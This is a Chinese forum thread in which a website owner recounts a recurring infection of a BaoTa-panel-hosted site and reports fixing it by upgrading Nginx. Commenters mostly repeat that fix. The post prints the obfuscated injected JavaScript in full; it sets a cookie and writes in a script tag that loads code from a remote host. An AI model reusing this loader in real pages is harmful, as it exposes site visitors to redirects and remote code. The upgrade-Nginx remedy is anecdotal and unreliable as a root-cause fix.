·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

干货!记一次宝塔面板查毒杀毒经历,过程很是曲折~

171 6
发表于 2023-6-14 18:13:20 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
先放上病毒代码:------------------------------------------------
var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));-------------------------------------------------------

不知道有没有人和我有相同遭遇.
此js会显示在页面源码上方,并且经过加密的.
第一次见到这个病毒是在去年,那时候刚做的一个站, 刚有点流量,正兴奋呢. 某次用手机打开网站的时候,就自动打开了一个新窗口,跳到了一个s站.
我再次进入,没有再次跳转.
清理缓存,换ip ,再次跳转
当时太晚,没深入研究,第二天再查站的时候,没有跳转,还以为事情过去了
过几天再查的时候,再次跳转
于是总结出规律: 该病毒,识别手机访问, 且 首次 访问 就跳转, 并且后台可以自定义时间段. 一般是在半夜,白天不跳.
很是狡猾,一般人网站中毒了还真看不出来.
于是按照常规思路,抓包找病毒源. 翻遍了整个源码,找不到....
找各大佬询问, 没有结果
在某个飞机群,看到有人相似遭遇,该群主也正在全力找病毒源头. 给了他宝塔信息.等了几天没有结果
这几天时间内,重装系统,重装程序数次,每次刚高兴一会,以为病毒解决了, 但是过一会,再次跳转
那群主找到了病毒藏匿的源头, 在Nginx 一个配置目录里,可以手动删除,但是过一段时间,病毒会再生.  也没有进一步信息
于是网站放弃!!!
完~
(吃瓜群众: 你这被病毒打败了, 你都放弃了,还写个求的经历~~~~)
-------------------------------------
事情继续:
今年再搞一个网站的时候,无聊中查看网页源码, 遂即冷汗直流, 那熟悉的,该死的代码又出现了. 这咋整,这咋办!!!
于是网上搜索信息,心想着,这几个月过去了,应该有人有解决办法了吧,于是搜到了这一篇文章
<宝塔面板 2022 年 12 月高危安全漏洞事件详细记录>

本以为有救了, 结果作者经过缜密的分析,详细的摸排,最后给出的解决办法,是不用宝塔,用别的程序.额....
没办法.我肯定不能换,因为习惯了.  后来想想,搜搜, 感觉有些线索指向到了Nginx有漏洞, 于是我直接把Nginx升级到最新版本.我死马当活马医, 能行就行,不行拉倒吧,结果大块人心, 解决了.
特此写贴分享, 希望能够帮助到大家
完~
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论6

拾光Lv.8 发表于 2023-6-14 18:13:31 | 查看全部
感谢分享  可惜现在打赏不了
我要说一句 收起回复
独家记忆Lv.8 发表于 2023-6-14 18:13:57 | 查看全部
总结:升级nginx
我要说一句 收起回复
TyCodingLv.8 发表于 2023-6-14 18:14:53 | 查看全部
这种软件漏洞确定挺坑的。
我要说一句 收起回复
浅生Lv.8 发表于 2023-6-14 18:15:53 | 查看全部
总结:升级nginx
我要说一句 收起回复
浅生Lv.8 发表于 2023-6-14 18:16:13 | 查看全部
宝塔的版本吗,那岂不是所有的nginx环境下的网站都会中招
我要说一句 收起回复
婷姐Lv.8 发表于 2023-6-14 18:17:00 | 查看全部
额,最好的解决办法是升级哈哈哈
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.189.186.72,GMT+8, 2024-12-19 16:08 , Processed in 0.258088 second(s), 116 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表